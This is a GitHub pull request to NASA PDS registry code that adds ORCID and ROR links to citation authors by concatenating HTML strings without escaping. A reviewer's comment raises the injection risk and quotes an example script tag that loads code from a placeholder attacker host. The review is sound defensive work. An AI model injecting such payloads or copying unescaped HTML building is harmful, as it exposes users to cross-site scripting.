### PR TITLE
Update citation author/editor handling to use JSON fields with ORCID and ROR links

### PR DESCRIPTION
**Pull request by jordanpadams**
## 🗒️ Summary

Replaces flattened citation metadata fields with JSON-based extraction to preserve nested relationships between authors/editors, affiliations, and organizations. Adds clickable links for ORCID identifiers on person names and ROR identifiers on organization names to enable direct access to contributor profiles and institutional information.

Changes:
- Remove deprecated flattened field constants from Constants.java
- Add new JSON field constants for citation_author/editor_person/organization_json
- Replace getAuthorEditorBlock() with processJsonField(), formatPerson(), formatOrganization()
- Parse JSON to extract nested Person and Organization structures with Affiliations
- Generate HTML links for person_orcid (ORCID) and organization_rorid (ROR) identifiers
- Handle both single and array affiliations per person

## ⚙️ Test Data and/or Report

Screenshot 2026-01-06 at 4 20 52 PM

## ♻️ Related Issues

- refs https://github.com/NASA-PDS/registry-legacy-solr/issues/237
- dependent upon https://github.com/NASA-PDS/registry-legacy-solr/pull/238

## 🤓 Reviewer Checklist

*Reviewers: Please verify the following before approving this pull request.*

### Security & Quality
- [ ] **SonarCloud:** Confirmed no new High or Critical security findings.
- [ ] **Secrets Detection:** Verified that the Secrets Detection scan passed and no sensitive information (keys, tokens, PII) is exposed.
- [ ] **Code Quality:** Code follows organization style guidelines and best practices for the specific language (e.g., PEP 8, Google Java Style).

### Testing & Validation
- [ ] **Test Accuracy:** Verified that test data is accurate, representative of real-world PDS4 scenarios, and sufficient for the logic being tested.
- [ ] **Coverage:** Automated tests cover new logic and edge cases.
- [ ] **Local Verification:** (If applicable) Successfully built and ran the changes in a local or staging environment.

### Documentation
- [ ] **Documentation:** README, Wiki, or inline documentation (Sphinx, Javadoc, Docstrings) have been updated to reflect these changes.

### Maintenance
- [ ] **Issue Traceability:** The PR is linked to a valid GitHub Issue or Jira Ticket.
- [ ] **Backward Compatibility:** Confirmed that these changes do not break existing downstream dependencies or API contracts (or that breaking changes are clearly documented).

### CODE REVIEW

File: src/main/java/gov/nasa/pds/dsview/registry/PDS4Search.java [hunk 1]
```diff
@@ -474,48 +477,148 @@ private String getAuthors(SolrDocument doc) {
...
+    } else if (person.has("display_full_name")) {
+      personName = person.getString("display_full_name");
+    }
+
+    // Add name with ORCID link if available
+    if (personName != null) {
+      if (person.has("person_orcid")) {
+        String orcidUrl = person.getString("person_orcid");
+        sb.append("<a href=\"").append(orcidUrl).append("\" target=\"_blank\">");
+        sb.append(personName);
```
Comment (nutjob4life) [inline src/main/java/gov/nasa/pds/dsview/registry/PDS4Search.java]: Is there any chance the upstream source could contain malicious data?

For example, suppose the `personName` contains `<script src='https://my.hackers.org/exploit/v1'>`. For this case, using an HTML element tree might be safer.

Yes, I can be a bit paranoid 😆
